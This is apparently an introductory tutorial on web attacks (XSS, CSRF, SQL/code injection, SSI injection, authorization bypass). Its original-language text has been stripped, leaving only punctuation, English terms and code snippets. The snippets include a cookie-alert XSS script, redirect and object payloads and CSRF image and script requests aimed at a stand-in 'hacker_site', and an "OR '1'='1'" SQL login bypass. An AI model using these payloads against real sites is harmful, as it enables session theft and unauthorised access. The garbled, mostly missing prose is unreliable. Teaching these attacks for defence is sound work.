:
- . , , .
:
- . , .
- . , .
, , . , .
WEB
:
- XSS (Cross-Site Scripting) - (Web ), , , , .
- XSRF / CSRF (Request Forgery) - , HTTP , : , , , (, ..), , , .
- Code injections (SQL, PHP, ASP ..) - , , .
- Server-Side Includes (SSI) Injection - , HTML .
- Authorization Bypass - ,
?
. :
XSS (Cross-Site Scripting)
XSS . , , , - .., . , , :
|
|
<script>alert(document.cookie);</script>
:
<script>window.parent.location.href='http://hacker_site';</script>
..:
<object type="text/x-scriptlet" data="http://hacker_site"></object>
: XSS (Cross Site Scripting)...
XSRF / CSRF (Request Forgery)
CSRF HTML <IMG> Javascript image. -, , , . :
IMG SRC
<img src="http://hacker_site/?command">
SCRIPT SRC
<script src="http://hacker_site/?command">
Javascript Image
<script>
var foo = new Image();
foo.src = "http://hacker_site/?command";
</script>
Code injections (SQL, PHP, ASP ..)
SQL.
2 - . SQL :
SELECT Username
FROM Users
WHERE Name = 'tester'
AND Password = 'testpass';
tester, :
testpass' OR '1'='1'
, , , , ..SQL :
SELECT Username
FROM Users
WHERE Name = 'tester'
AND Password = 'testpass' OR '1'='1';
'1'='1' SQL .